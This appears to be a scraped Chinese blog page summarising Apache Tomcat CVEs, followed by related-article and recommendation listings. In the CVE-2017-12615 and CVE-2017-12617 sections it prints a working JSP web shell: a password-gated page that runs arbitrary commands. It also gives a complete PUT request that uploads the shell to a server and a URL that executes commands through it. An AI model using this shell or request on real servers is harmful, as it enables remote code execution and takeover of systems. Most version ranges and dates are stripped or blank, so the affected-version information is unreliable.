cve-2020-1938

Date

2020.1(长亭科技提交)

类型

RCE

影响范围(低版本未测试)

Apache Tomcat .x < 9.0.

Apache Tomcat .x < 8.5.

Apache Tomcat .x < 7.0.

Apache Tomcat .x

管理后台弱口令

CVE-2019-0232

Date



类型

任意代码执行

影响版本

Apache Tomcat 9.0..M1 to 9.0.

Apache Tomcat 8.5. to 8.5.

Apache Tomcat 7.0. to 7.0.

前置条件

操作系统:Windows

CVE-2019-0211

Date



类型

提权

影响版本

CVE-2017-12615

Date



影响范围

 Apache Tomcat 7.0. - 7.0.

前置条件

(1)web.xml



(2)
http协议支持Put请求
(3)
操作系统:Windows

复现

(1)发包

PUT /dark.jsp HTTP/1.1
Host: xx.xx.163.193:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 1039



<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>


(2)命令执行
xx.xx.163.193:8083/dark.jsp?&pwd=023&cmd=whoami




CVE-2017-12616




Date



类型

信息泄露



影响范围

Apache Tomcat 7.0. - 7.0. 

前置条件

server.xml-VirtualDirContext-默认无-手工添加




CVE-2017-12617




Date



类型

远程代码执行

影响范围

Apache Tomcat 7.0. – 7.0.81

poc:
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!public static String excuteCmd(String c) 
{
    StringBuilder line = new StringBuilder();
try 
{
    Process pro = Runtime.getRuntime().exec(c);
    BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
    String temp = null;
    while ((temp = buf.readLine()) != null) 
    {
        line.append(temp+"\\n");
    }
    buf.close();
} 
catch (Exception e) 
{
    line.append(e.getMessage());
}
return line.toString();
}
%>
<%
if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))
{
    out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}
else
{
    out.println(":-)");
}
%>




Apache Tomcat 块请求远程拒绝服务漏洞(CVE-2014-0075)
												


											
应用安全 - 中间件 - Tomcat - 漏洞 - 汇总的更多相关文章
	

    
								
  1. 应用安全 - 中间件 - IIS - 漏洞 - 汇总
		
    简介 支持协议 HTTP HTTP/2 HTTPS FTP FTPS SMTP NNTP等 支持操作系统 NT/2000/XP Professional/Server 2003及后续版本(XP Hom ...
    
		
    2. 
						
  2. Web中间件常见漏洞总结
		
    一.IIS中间组件: 1.PUT漏洞 2.短文件名猜解 3.远程代码执行 4.解析漏洞 二.Apache中间组件: 1.解析漏洞 2.目录遍历 三.Nginx中间组件: 1.文件解析 2.目录遍历 3 ...
    
		
    3. 
						
  3. Web中间件 - 常见漏洞总结
		
    *文章来源:https://blog.egsec.cn/archives/472 *本文将主要说明:Web中间件常见漏洞的产生原因以及修复方案 什么是Web中间件? 百度百科是这样解释的:中间件是介于 ...
    
		
    4. 
						
  4. Tomcat漏洞说明与安全加固
		
    Tomcat是Apache软件基金会的一个免费的.开放源码的WEB应用服务器,可以运行在Linux和Windows等多个平台上,由于其性能稳定.扩展性好.免费等特点深受广大用户的喜爱.目前,互联网上绝 ...
    
		
    5. 
						
  5. 常见Java库漏洞汇总
		
    1.ActiveMQ 反序列化漏洞(CVE-2015-5254) ref:https://www.nanoxika.com/?p=408 Apache ActiveMQ是美国阿帕奇(Apache)软件 ...
    
		
    6. 
						
  6. Apache Shiro 漏洞汇总
		
    Apache Shiro 漏洞汇总 以下是我个人通过收集信息收集起来的一些Apache Shiro漏洞信息,这些漏洞的poc都是公开的,利用起来也是比较简单 Apache Shiro是什么东西: Ap ...
    
		
    7. 
						
  7. 常见web中间件漏洞(四)Tomcat漏洞
		
    这部分好久没写了,继续更新web中间件漏洞思路整理(不复现) ,争取...整理完 前几篇指路链接: nginx: https://www.cnblogs.com/lcxblogs/p/13596239 ...
    
		
    8. 
						
  8. 应用安全 - 工具 - 中间件 - Apache - Apache Tika - 漏洞汇总
		
    CVE-2016-6809 Date2016 类型远程代码执行 影响范围Apache Tika 1.6-1.13 CVE-2018-1335 Date2018 类型命令注入 影响范围Tika-serv ...
    
		
    9. 
						
  9. Tomcat漏洞利用与安全加固实例分析
		
    Tomcat中间件经常遇到的漏洞: 1.Tomcat默认存在一个管理后台,默认的管理地址是http://IP或域名:端口号/manager/html 2.Axis2默认口令安全漏洞,默认的管理地址是h ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. Linux知识点(二)
			
    1 df 查看磁盘空间使用情况 df: disk free 空余硬盘 1.基本语法 df  项 (功描能述:列出文件系统的整体磁盘使用量,检查文件系统的磁盘空间占用情况)选 2.选项说明 选项 功能  ...
    
			
    2. 
						
  2. 【LuoguP4081】[SCOI2015]小凸想跑步
			
    题目链接 题意 给你一个凸多边形,求出在其内部选择一个点,这个点与最开始输入的两个点形成的三角形是以该点对凸多边形三角剖分的三角形中面积最小的一个三角形的概率. Sol 答案就是 可行域面积与该凸多边 ...
    
			
    3. 
						
  3. C#  扩展方法——mysql-dapper(MySqlMapperExtensions)
			
    其他扩展方法详见:https://www.cnblogs.com/zhuanjiao/p/12060937.html 反射比较耗费性能,反射得到属性进行缓存 根据反射得到的属性,进行动态拼接sql语句 ...
    
			
    4. 
						
  4. 使用oracle Sqlplus中上下键出现乱码的问题
			
    安装rlwrap,前提是安装readline和readline-devel yum list | grep readlineyum install -y readline.x86_64 readlin ...
    
			
    5. 
						
  5. QT Creator有中文出现“常量中有换行符 ”的解决办法
			
    QT Creator有中文出现“常量中有换行符 ”的解决办法 QT Creator在QT5.9下报错“常量中有换行符 ”,我的代码中有中文,而且在Windows 10下用微软VS编译器编译.造成这个报 ...
    
			
    6. 
						
  6. 51 Nod N^N的末位数字
			
    1004 n^n的末位数字  题目来源: Author Ignatius.L (Hdu 1061) 基准时间限制:1 秒 空间限制:131072 KB 分值: 5 难度:1级算法题  收藏  关注 给 ...
    
			
    7. 
						
  7. HGOI20190706 题解
			
    Problem A 质因数 设f(x) 表示x的不同质因子个数,给出T组x,询问f(x)的值. 对于100%的数据 $x,T \leq 10^5 $ Sol : 第一遍欧拉筛,并记录下每个数的最小质因 ...
    
			
    8. 
						
  8. RedHat6.2系统安装ipvsadm+keepalived
			
    一.安装IPVS 软件包下载: 链接:https://pan.baidu.com/s/1zNgPtALbdBTC1H6e0IaZPw 提取码:xm7t 1.检查内核模块,看一下ip_vs 是否被加载  ...
    
			
    9. 
						
  9. 使用VSCODE开发UE4
			
    完全可行,速度很快,智能提示.代码格式化.查找Symbol等等都不比VS+Visual AssistX 差. 准备 打开编辑器的Editor Preferences>Source Code,选择 ...
    
			
    10. 
						
  10. HDU 5249:KPI(权值线段树)
			
    KPI Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 32768/32768 K (Java/Others) Problem Desc ...
    
			
    11.